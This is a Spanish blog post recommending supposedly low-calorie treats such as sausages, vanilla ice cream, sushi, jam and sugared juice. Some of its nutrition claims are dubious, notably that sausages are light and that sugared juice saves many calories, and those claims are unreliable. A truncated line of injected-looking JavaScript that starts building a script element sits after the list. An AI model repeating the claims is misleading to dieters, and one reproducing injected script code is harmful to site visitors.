Salud y belleza » Alimentación

Buscando el equilibrio entre lo rico y lo light

Sin Comentarios

Más cura la dieta, que la receta. Son sabias palabras: no hay mejor forma de cuidar nuestro organismo que, por supuesto, controlando los hábitos. En ese aspecto la comida representa, sin dudas, una de las costumbres más difíciles de mantener a raya.

Es decir, podemos vivir sin fumar y sin beber alcohol -aunque a veces nos parezca una tarea imposible- pero en cambio no podemos mantener nuestra existencia si no nos alimentamos, lo que ya representa un punto en contra.

El problema número uno del hombre y sus vicios, está relacionado estrictamente con el modo de alimentarse, es decir con su dieta. Es casi una máxima que todo lo rico engorda, y todo lo bueno hace mal. Aún así ésta no es la única forma de ver el mundo –de ser así resultaría triste- pues existen excepciones: a continuación presentamos un grupo de comidas que, siendo ricas, no son de aquellas consideradas “excesivamente engordadoras”. Un conjunto de alimentos ideales para satisfacer nuestras necesidades básicas y, a su vez, no tirar “la casa por la ventana”. Equilibrio, esa es la palabra.

¿Quieres darte un gusto sin destruir tu dieta?

  • Salchichas. Es un mito popular aquello de que las salchichas tienen muchas calorías. Es decir, sí, poseen calorías, por no tanto como otras carnes más comunes. Además, las salchichas se suelen acompañar –al menos así lo hace la mayoría- con mostaza y, en efecto, este aderezo prácticamente no tiene calorías (la mayonesa, por estar hecha a base de huevos, sí poseen muchas calorías).
  • Helado de vainilla. ¿Tienes un antojo? Inclínate por el helado de vainilla. A diferencia de otras cremas heladas como las de chocolate o frutilla, el helado de vainilla no alberga demasiadas calorías. Por lo tanto es una buena alternativa para mojar nuestras papilas gustativas con un rico sabor al menos por un rato.
  • Sushi. Estos deliciosos bocaditos de arroz, pescado fresco y algas representan una excelente opción para darse un gusto sin la necesidad de destruir la dieta por completo. Bajo en calorías, fresco y rico.
  • Mermeladas naturales: de entre todos los dulces, las mermeladas son quizás las opciones más acertadas para colocar en una dieta. Son similares a una golosina, al menos en sabor, y además el mercado cuenta con una variedad gigantesca de éste tipo de dulces bajo la firma “diet” o “light” con lo que podremos ahorrar algunas calorías.
  • Zumos con azúcar. Cualquier jugo frutal (naranja, durazno, pera, etc.) aún con el agregado de alguna cucharadita de azúcar es mucho más sano que un vaso de gaseosas de cola. Cuando tenemos sed y queremos darnos, nuevamente, algún gusto escojamos entonces algún zumo azucarado y ahorraremos muchas calorías (…en comparación con los refrescos, claro).

if (document.currentScript) { var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.